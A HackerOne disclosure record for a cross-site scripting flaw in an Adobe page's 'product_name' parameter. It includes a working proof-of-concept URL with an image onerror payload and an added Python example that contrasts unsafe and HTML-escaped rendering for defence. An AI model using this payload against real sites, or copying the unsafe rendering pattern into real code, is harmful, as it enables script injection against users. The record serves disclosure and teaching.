Adobe: Adobe XSS

2015-03-06T17:22:26
ID H1:50389
Type hackerone
Reporter dsopas
Modified 2016-10-18T20:37:15

Description

A cross-site scripting vulnerability exists in the "product_name" variable of this Adobe web application. The XSS vector can be changed to work across browsers, and the following proof-of-concept works in Firefox.

Proof-of-concept: http://www.adobe.com/cfusion/google/fonts/content.cfm?spider=google&code=/type/browser/pdfs/BLCQ/BellCentennialStd-NameNum.pdf&type=resource&product_name=%3C/a%3E%3Cimg%20src=x%20onerror=alert%28/dsopas/%29%3E%3C!--
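The fix for this class of bug is HTML-encoding `product_name` at output time. The added example below (not part of the original report, and not Adobe's code) decodes the parameter from the proof-of-concept URL and renders it raw and encoded. The template is an assumption: the real page markup is not in the report, and reflection inside an `<a>` element is inferred only from the payload's leading `</a>`.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Proof-of-concept URL copied from the report above.
POC_URL = ("http://www.adobe.com/cfusion/google/fonts/content.cfm?spider=google"
           "&code=/type/browser/pdfs/BLCQ/BellCentennialStd-NameNum.pdf"
           "&type=resource&product_name="
           "%3C/a%3E%3Cimg%20src=x%20onerror=alert%28/dsopas/%29%3E%3C!--")

# Assumed template (hypothetical): the value is reflected as link text.
TEMPLATE = '<a href="/type/product.html">{name}</a>'


class TagAudit(HTMLParser):
    """Records start tags, inline event-handler attributes and text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags, self.handlers, self.text = [], [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers += [(tag, k) for k, _ in attrs if k.startswith("on")]

    def handle_data(self, data):
        self.text.append(data)


def product_name(url):
    """Return the URL-decoded product_name query parameter."""
    return parse_qs(urlsplit(url).query)["product_name"][0]


def render_unsafe(name):
    # Vulnerable pattern: request data concatenated into markup as-is.
    return TEMPLATE.format(name=name)


def render_safe(name):
    # Hardened pattern: encode for the HTML text context before output.
    return TEMPLATE.format(name=escape(name, quote=True))


def audit(markup):
    """Parse markup and return (start tags, event handlers, text)."""
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.handlers, "".join(parser.text)
```

On a ColdFusion page the corresponding output encoder is `encodeForHTML()`.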